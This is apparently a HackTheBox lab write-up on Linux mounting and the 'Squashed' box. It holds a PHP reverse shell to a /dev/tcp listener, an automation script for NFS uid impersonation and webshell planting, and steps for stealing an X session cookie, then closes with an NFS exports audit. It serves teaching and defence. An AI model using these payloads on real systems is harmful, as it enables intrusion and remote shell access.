MOUNT A FILE SYSTEM IN LINUX | DEMO: SQUASHED HTB EASY BOX
What does it mean to mount a file system in Linux? A better way to describe “mount” is “attach”. The filesystem being mounted is attached to a directory of the existing filesystem: the top-level directory of the mounted filesystem takes the place of that directory, its subdirectories become subdirectories of that directory, and so on. (The directory being mounted on does not have to be empty, but after mounting, any contents it had are inaccessible until the filesystem is unmounted.)
Unlike Windows, where different file systems get different drive letters like C: and D:, Unix-like systems have a single directory tree rooted at /. So when you attach a new disk drive or USB stick to a Linux system, the new filesystem has to appear somewhere inside the existing tree; in other words, some existing directory must serve as the root of the new filesystem. These directories are known as mount points. For removable drives the mount points are usually located under /media, but they can be anywhere.
Mounting a filesystem simply means making that filesystem accessible at a chosen point in the Linux directory tree. It does not matter whether the filesystem lives on a hard disk partition, a CD-ROM, a floppy, a USB storage device or, as in the demo below, a network share. You mount it with the mount command; /mnt is the conventional place for temporary mounts.
Example: sudo mount /dev/sda3 /mnt
For demo purposes I am going to use a vulnerable box from the HackTheBox platform called Squashed.
Gaining a Foothold
We are provided with an IP address, so we use nmap to scan the machine for open ports and services. We get the following results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45669/tcp6 mountd
| 100005 1,2,3 50287/udp6 mountd
| 100005 1,2,3 53317/tcp mountd
| 100005 1,2,3 54473/udp mountd
| 100021 1,3,4 33785/tcp6 nlockmgr
| 100021 1,3,4 34763/tcp nlockmgr
| 100021 1,3,4 39022/udp nlockmgr
| 100021 1,3,4 50677/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
34385/tcp open mountd 1-3 (RPC #100005)
34763/tcp open nlockmgr 1-4 (RPC #100021)
50976/tcp filtered unknown
53317/tcp open mountd 1-3 (RPC #100005)
54765/tcp open mountd 1-3 (RPC #100005)
From the TTL (and the Ubuntu service banners on ports 22 and 80) we can tell it is a Linux box, and it has an NFS service on port 2049! Can we try a more detailed scan aimed at that service? Yes we can, with the nfs-ls script: sudo nmap 10.10.11.191 --script nfs-ls
We get the following results:
➜ Squashed sudo nmap 10.10.11.191 --script nfs-ls
[sudo] password for trustie:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-26 19:34 EAT
Nmap scan report for 10.10.11.191
Host is up (1.4s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
| nfs-ls: Volume /home/ross
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 1001 1001 4096 2022-11-25T05:48:36 .
| ?????????? ? ? ? ? ..
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .cache
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .config
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .local
| rw------- 1001 1001 2475 2022-10-31T10:13:23 .xsession-errors.old
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Documents
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Music
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Pictures
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Public
|
|
| Volume /var/www/html
| access: Read NoLookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-- 2017 33 4096 2022-11-26T16:30:01 .
| ?????????? ? ? ? ? ..
| ?????????? ? ? ? ? .htaccess
| ?????????? ? ? ? ? css
| ?????????? ? ? ? ? images
| ?????????? ? ? ? ? index.html
| ?????????? ? ? ? ? js
|_
2049/tcp open nfs
The nfs-ls output lists every exported directory along with the access our client was given. The same export list comes from showmount -e 10.10.11.191:
➜ nmap showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *
So the server exports /home/ross and /var/www/html, and the * means any client may mount them. Next we mount both into our own filesystem with the following commands:
➜ nmap sudo mkdir /mnt/ross_folder && sudo mkdir /mnt/web_folder
➜ nmap cd /mnt
➜ /mnt sudo mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock
➜ /mnt sudo mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock
➜ /mnt ls web_folder
ls: cannot access 'web_folder/index.html': Permission denied
ls: cannot access 'web_folder/images': Permission denied
ls: cannot access 'web_folder/css': Permission denied
ls: cannot access 'web_folder/js': Permission denied
css images index.html js
From the above results we can see that we cannot read the files because of their permissions. Our client is root, and NFS with the default root_squash option maps uid 0 to the anonymous user nobody, who gets no read access to files with mode rwxr-xr-- and rw-r-----. Any other uid, however, is passed through and trusted as-is by the default sec=sys security flavour. The nmap results showed the files are owned by uid 2017 (gid 33, www-data), so we create a throwaway user with that uid and try again:
sudo useradd haha
sudo usermod -u 2017 haha
sudo groupmod -g 2017 haha
Only the uid has to match here, since the owner bits already grant read; the groupmod line changes the gid of the haha group and is harmless. Now we can switch to this user haha and access the mounted files:
➜ /mnt su haha
$ ls
kenobiNFS ross_folder web_folder
$ cd web_folder
$ ls
css images index.html js
$ ls -al
total 56
drwxr-xr-- 5 haha www-data 4096 Nov 26 19:15 .
drwxr-xr-x 5 root root 4096 Nov 26 18:57 ..
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 css
-rw-r--r-- 1 haha www-data 44 Oct 21 13:30 .htaccess
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 images
-rw-r----- 1 haha www-data 32532 Nov 26 19:15 index.html
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 js
$ cat .htaccess
AddType application/x-httpd-php .htm .html
These files are the web root, and the .htaccess line above tells Apache to treat .htm and .html files as PHP, so the server executes PHP here. Because our uid-2017 user owns the directory, we can write a malicious PHP file into the images directory with the following content. With a listener waiting on port 1337, browsing to that file under the images path of the web site executes it and sends a reverse shell back to us:
<?php system("bash -c 'bash -i &>/dev/tcp/10.10.*.48/1337 <&1'");?>
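The whole chain above (mount the export, find the owning uid, act as that uid, drop the PHP file) as an added shell example. This is my code, not the write-up's, and it goes one step beyond the text by using sudo's numeric-id syntax instead of creating a throwaway account. TARGET and MNT are placeholders, the ls listing is constructed, and the attacker address in the usage comment is an assumption.

```shell
#!/bin/sh
# Added example, not code from the write-up. With the default AUTH_SYS flavour
# (sec=sys) the NFS server trusts whatever uid/gid the client puts in the RPC
# credential; only uid 0 is remapped to nobody by root_squash. That is why root
# on our box got "Permission denied" but uid 2017 reads everything. sudo's
# numeric "#uid" form lets us send any id without adding an account.
# TARGET and MNT are placeholders; SAMPLE_LS is a CONSTRUCTED `ls -ln` listing
# shaped like the one on the mounted web root.

TARGET=${TARGET:-10.10.11.191}
MNT=${MNT:-/mnt/web_folder}

SAMPLE_LS='total 56
drwxr-xr-- 5 2017 33 4096 Nov 26 19:15 .
drwxr-xr-x 5 0 0 4096 Nov 26 18:57 ..
drwxr-xr-x 2 2017 33 4096 Nov 26 19:15 css
-rw-r----- 1 2017 33 32532 Nov 26 19:15 index.html
-rw------- 1 1001 1001 2475 Oct 31 10:13 notes.txt'

# owner_ids: read `ls -ln` output on stdin, print every distinct uid:gid that
# owns an entry (skips the "total" line and the . and .. entries).
owner_ids() {
  awk 'NF >= 9 && $9 != "." && $9 != ".." { print $3 ":" $4 }' | sort -u
}

# mount_export: NFSv3 mount of TARGET:<export> on <mountpoint>, read-only
# unless "rw" is passed as the third argument.
mount_export() {
  sudo mkdir -p "$2"
  sudo mount -t nfs -o "vers=3,nolock,${3:-ro}" "$TARGET:$1" "$2"
}

# as_id: run a command with an arbitrary uid and gid. sudo accepts numeric ids
# even when no matching account exists, so no useradd/usermod is needed.
as_id() {
  uid=$1; gid=$2; shift 2
  sudo -u "#$uid" -g "#$gid" "$@"
}

# webshell_payload: the write-up's PHP reverse shell, parameterised on the
# listener host and port.
webshell_payload() {
  printf '%s\n' "<?php system(\"bash -c 'bash -i &>/dev/tcp/$1/$2 <&1'\");?>"
}

# Typical run (needs local root and a reachable target; 10.10.14.5 is an
# assumed attacker address):
#   mount_export /var/www/html "$MNT" rw
#   ids=$(ls -ln "$MNT" | owner_ids)          # 2017:33 on Squashed
#   uid=${ids%%:*}; gid=${ids##*:}            # assumes a single owner pair
#   webshell_payload 10.10.14.5 1337 | as_id "$uid" "$gid" tee "$MNT/images/x.php" >/dev/null
#   nc -lvnp 1337   # in another terminal, then:
#   curl -s "http://$TARGET/images/x.php"
```

The trick depends on the export's squash settings: with the default root_squash only uid 0 is rewritten, so any other uid we claim is honoured; with all_squash every client uid would be mapped to the anonymous user and this would not work, and with no_root_squash we would not even need to impersonate anyone.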
We get a reverse shell as the user alex (the account Apache runs as), and the user flag can be found in /home/alex. We could continue escalating privileges to root and grab the root flag, but that is not important with regard to this article, so you can skip this part, scroll down and clap for me if the article was useful!
Privilege Escalation
Moving forward we note that there is another user, ross. In her home directory we find a .Xauthority file and a Passwords.kdbx file.
The .Xauthority file is used by the X Window System to control access to a user's X server. It holds authorization cookies (normally MIT-MAGIC-COOKIE-1 entries, each tied to a hostname and display number) that a client must present in order to connect to that display. The file lives in the user's home directory and is created when the user first starts an X session. The Passwords.kdbx file is a KeePass database; you can try to crack it with John the Ripper (keepass2john extracts the hash for it), but in my case I had no success with that. Since the cookie is what authorizes connections to ross's X display, and she is also logged in, anyone holding a copy of it can talk to her running session. To get it we create a fake user with the uid of ross on our machine, read the file from the NFS mount, and transfer the .Xauthority file to our shell on the box. You can use a Python HTTP server…
Oops, at this point I can't complete the box either :/
To finish the box, follow the instructions on the HackTricks page.
Finally, to delete the temporary user and unmount the shares (one umount per mount point), use these commands:
➜ /mnt sudo userdel haha
➜ /mnt sudo umount directory_name
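What made all of this possible is the export configuration behind that showmount output: both directories are exported to *, with the default sec=sys, so the server believes whatever uid the client claims and root_squash only protects uid 0. As an added example (mine, not the write-up's, and going beyond the page since the box's real /etc/exports is never shown), here is a small shell audit that flags those settings, with a constructed weak exports file next to a hardened one.

```shell
#!/bin/sh
# Added example, not from the write-up: flag the /etc/exports settings that let
# a client-chosen uid read an export. Both files below are CONSTRUCTED; the real
# exports file of the box is not shown in the write-up.

# Weak: exported to any host, default sec=sys, and /home/ross even with
# no_root_squash (a client's root is root on the share).
WEAK_EXPORTS='# /etc/exports (constructed)
/home/ross      *(rw,sync,no_subtree_check,no_root_squash)
/var/www/html   *(rw,sync,no_subtree_check)
'

# Hardened: clients pinned to a subnet, read-only, root squashed, and
# sec=krb5p so the uid comes from a Kerberos ticket, not the client's claim.
# (Without Kerberos, the next best option is all_squash with anonuid/anongid.)
HARDENED_EXPORTS='/home/ross      10.10.11.0/24(ro,sync,no_subtree_check,root_squash,sec=krb5p)
/var/www/html   10.10.11.0/24(ro,sync,no_subtree_check,root_squash,sec=krb5p)
'

# audit_exports: read exports text on stdin, print "<path> <client> <finding>"
# per issue. WORLD: client is "*". NO_ROOT_SQ: no_root_squash set. AUTH_SYS: no
# sec=krb5*, so the server trusts the client-supplied uid/gid. RW: writable.
audit_exports() (
  set -f   # the "*" client must not glob-expand against the cwd
  sed -e 's/#.*//' -e '/^[[:space:]]*$/d' | while read -r path clients; do
    for spec in $clients; do
      client=${spec%%\(*}
      opts=${spec#*\(}; opts=${opts%\)}
      [ "$spec" = "$client" ] && opts=""   # entry without an option list
      case "$client" in '*') echo "$path $client WORLD";; esac
      case ",$opts," in *,no_root_squash,*) echo "$path $client NO_ROOT_SQ";; esac
      case ",$opts," in *,sec=krb5*) ;; *) echo "$path $client AUTH_SYS";; esac
      case ",$opts," in *,rw,*) echo "$path $client RW";; esac
    done
  done
)

# printf '%s' "$WEAK_EXPORTS" | audit_exports       # seven findings
# printf '%s' "$HARDENED_EXPORTS" | audit_exports   # nothing
```

Run it against a real /etc/exports with `audit_exports < /etc/exports`. An AUTH_SYS finding on its own is enough for the uid trick shown in this article; NO_ROOT_SQ means the attacker does not even need it.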
Writeups for the box are Tahafarooq and Oxdf
Clap and follow me for more :)